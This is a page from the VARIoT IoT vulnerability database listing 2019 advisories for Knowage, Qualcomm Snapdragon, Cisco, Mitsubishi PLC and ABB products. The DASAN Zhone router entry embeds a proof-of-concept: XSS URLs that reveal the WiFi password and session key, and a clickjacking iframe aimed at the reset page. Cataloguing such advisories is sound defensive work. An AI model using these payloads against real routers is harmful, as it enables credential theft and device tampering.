VARIoT IoT vulnerabilities database
| VAR-201909-0676 | CVE-2019-13349 | Knowage Vulnerabilities related to certificate and password management |
CVSS V2: 4.0 CVSS V3: 4.9 Severity: MEDIUM |
In Knowage through 6.1.1, an authenticated user who accesses the users page will obtain all user password hashes. Knowage contains vulnerabilities related to certificate and password management. Information may be obtained.
| VAR-201909-0690 | CVE-2019-13190 | Knowage Authentication vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
In Knowage through 6.1.1, the sign up page does not invalidate a valid CAPTCHA token. This allows for CAPTCHA bypass in the signup page. Knowage contains an authentication vulnerability. Service operation may be interrupted (DoS).
| VAR-201909-1467 | CVE-2019-10677 | DASAN Zhone ZNID GPON 2426A EU Cross-Site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Multiple Cross-Site Scripting (XSS) issues in the web interface on DASAN Zhone ZNID GPON 2426A EU version S3.1.285 devices allow a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameter: /zhndnsdisplay.cmd (name), /wlsecrefresh.wl (wlWscCfgMethod, wl_wsc_reg). The DASAN Zhone ZNID GPON 2426A EU device contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. DASAN Zhone ZNID GPON 2426A EU is a wireless router from DASAN Korea. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code.
# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677
= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
| VAR-201909-1428 | CVE-2019-10497 | plural Snapdragon Vulnerability in using freed memory in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
A use-after-free issue occurs if another instance of open for the voice_svc node is called from an application without closing the previous one, in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. Multiple Snapdragon products contain a use-after-free vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Qualcomm MDM9206 and the others are Qualcomm products. MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in Audio in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products.
| VAR-201909-1457 | CVE-2019-10506 | plural Snapdragon Vulnerability related to input validation in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
While processing the QCA_NL80211_VENDOR_SUBCMD_AVOID_FREQUENCY vendor command, the driver does not validate the data obtained from user space, which could be invalid and thus lead to undesired behaviour, in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in MDM9206, MDM9607, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDM630, SDM660, SDX24. Multiple Snapdragon products contain an input validation vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Qualcomm MDM9206 and the others are Qualcomm products. MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. An input validation error vulnerability exists in WLAN in several Qualcomm products. The vulnerability stems from the failure of the network system or product to properly validate the input data.
| VAR-201909-1458 | CVE-2019-10507 | plural Snapdragon Product out-of-bounds vulnerability |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
A missing check of extscan change results received from firmware can lead to an out-of-buffer read in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 210/SD 212/SD 205, SD 425, SD 430, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM630, SDM660, SDX20, SDX24. Multiple Snapdragon products contain an out-of-bounds vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Qualcomm MDM9206 and the others are Qualcomm products. MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in WLAN in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc.
| VAR-201909-1123 | CVE-2019-2284 | plural Snapdragon Vulnerability in using freed memory in products |
CVSS V2: 4.4 CVSS V3: 7.0 Severity: HIGH |
Possible use-after-free issue due to a race condition while calling camera ioctl concurrently in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MSM8909W, QCS405, QCS605, Qualcomm 215, SD 425, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 845 / SD 850, SD 855, SDM439, SDX24. Multiple Snapdragon products contain a use-after-free vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). SD 712 is a central processing unit (CPU) product. SD 710 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in the Camera in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products.
| VAR-201909-0986 | CVE-2019-2333 | plural Snapdragon Classic buffer overflow vulnerability in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Buffer overflow due to improper validation of buffer size while the IPA driver performs a read operation, in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9607, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. Multiple Snapdragon products contain a classic buffer overflow vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Qualcomm MDM9607 and the others are Qualcomm products. MDM9607 is a central processing unit (CPU) product. MDM9650 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in the IPA driver in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc.
| VAR-201909-0987 | CVE-2019-2341 | plural Snapdragon Classic buffer overflow vulnerability in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Buffer overflow when the audio buffer size provided by the user is larger than the maximum allowable audio buffer size, in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS405, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. Multiple Snapdragon products contain a classic buffer overflow vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS).
| VAR-201909-0985 | CVE-2019-1976 | Cisco Industrial Network Director Vulnerabilities related to certificate and password management |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
A vulnerability in the “plug-and-play” services component of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to access sensitive information on an affected device. The vulnerability is due to improper access restrictions on the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to access running configuration information about devices managed by the IND, including administrative credentials. Cisco Industrial Network Director (IND) is an industrial automation management system from Cisco. The system is automated through the visualization of industrial Ethernet infrastructure
| VAR-201909-0206 | CVE-2019-12633 | Cisco Unified Contact Center Express Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on a targeted system. The vulnerability is due to improper validation of user-supplied input on the affected system. An attacker could exploit this vulnerability by sending the user of the web application a crafted request. If the request is processed, the attacker could access the system and perform unauthorized actions. This component supports functions such as self-service voice service, call distribution, and customer access control. A code issue vulnerability exists in Cisco Unified CCX releases prior to 11.6(2)ES04 and releases prior to 12.0(1)SU0.1
| VAR-201909-0154 | CVE-2019-12645 | Cisco Jabber Client Framework Input validation vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in Cisco Jabber Client Framework (JCF) for Mac Software, installed as part of the Cisco Jabber for Mac client, could allow an authenticated, local attacker to execute arbitrary code on an affected device. The vulnerability is due to improper file level permissions on an affected device when it is running Cisco JCF for Mac Software. An attacker could exploit this vulnerability by authenticating to the affected device and executing arbitrary code or potentially modifying certain configuration files. A successful exploit could allow the attacker to execute arbitrary code or modify certain configuration files on the device using the privileges of the installed Cisco JCF for Mac Software. Cisco Jabber Client Framework (JCF) contains an input validation vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Cisco Jabber Client Framework (JCF) is a unified communications client framework from Cisco. The framework provides online status display, instant messaging, voice and other functions. An input validation error vulnerability exists in Cisco JCF 12.6(1) and earlier versions on the Mac platform. The vulnerability is caused by the program assigning incorrect permissions to files.
| VAR-201909-0207 | CVE-2019-12635 | Cisco Content Security Management Appliance Software Authorization vulnerability |
CVSS V2: 3.5 CVSS V3: 4.3 Severity: MEDIUM |
A vulnerability in the authorization module of Cisco Content Security Management Appliance (SMA) Software could allow an authenticated, remote attacker to gain out-of-scope access to email. The vulnerability exists because the affected software does not correctly implement role permission controls. An attacker could exploit this vulnerability by using a custom role with specific permissions. A successful exploit could allow the attacker to access the spam quarantine of other users. This appliance is mainly used to manage all policies, reports, audit information, etc. of email and web security appliances
| VAR-201909-0205 | CVE-2019-12632 | Cisco Finesse Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in Cisco Finesse could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on an affected system. The vulnerability exists because the affected system does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to a user of the web application. A successful exploit could allow the attacker to access the system and perform unauthorized actions. Cisco Finesse contains an input validation vulnerability. Information may be tampered with. Cisco Finesse is a set of call center management software developed by Cisco.
| VAR-201909-0153 | CVE-2019-12644 | Cisco Identity Services Engine Software Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability exists because the web-based management interface of the affected device does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information
| VAR-201909-1561 | No CVE | Denial of Service Vulnerability in MITSUBISHI PLC (CNVD-2019-30336) |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric.
MITSUBISHI PLC has a denial of service vulnerability that could be exploited by an attacker to cause a denial of service
| VAR-201909-1563 | No CVE | MITSUBISHI PLC has a denial of service vulnerability |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric.
MITSUBISHI PLC has a denial of service vulnerability, which can be exploited by attackers to cause a denial of service.
| VAR-201909-1562 | No CVE | MITSUBISHI PLC has a denial of service vulnerability (CNVD-2019-30335) |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric.
MITSUBISHI PLC has a denial of service vulnerability, which can be exploited by attackers to cause a denial of service.
| VAR-201909-1545 | No CVE | ABB zenon Editor has dll hijacking vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The ABB Group ranks among the world's top 500 companies and is headquartered in Zurich, Switzerland, dedicated to providing solutions for customers in the industrial and power industries.
ABB zenon Editor has a DLL hijacking vulnerability that can be used by attackers to gain server permissions.
| VAR-201911-1433 | CVE-2019-2258 | plural Snapdragon Vulnerability related to array index verification in products |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Improper validation of array index causes OOB write and then leads to memory corruption in MMCP in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9607, MDM9615, MDM9625, MDM9635M, MDM9640, MDM9650, MDM9655, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 650/52, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SD 8CX, SDA660, SDM439, SDM630, SDM660, SDX20, Snapdragon_High_Med_2016, SXR1130. Multiple Snapdragon products contain a vulnerability related to array index validation. Information may be obtained or altered, and service operation may be disrupted (DoS). Qualcomm MDM9607 and the others are all Qualcomm products. MDM9607 is a central processing unit (CPU) product. Qualcomm MDM9150 is a central processing unit (CPU) product. SDX20 is a modem.
MMCP in many Qualcomm products has an input validation error vulnerability. The vulnerability stems from the fact that the network system or product did not correctly verify the input data; no detailed vulnerability information is currently available.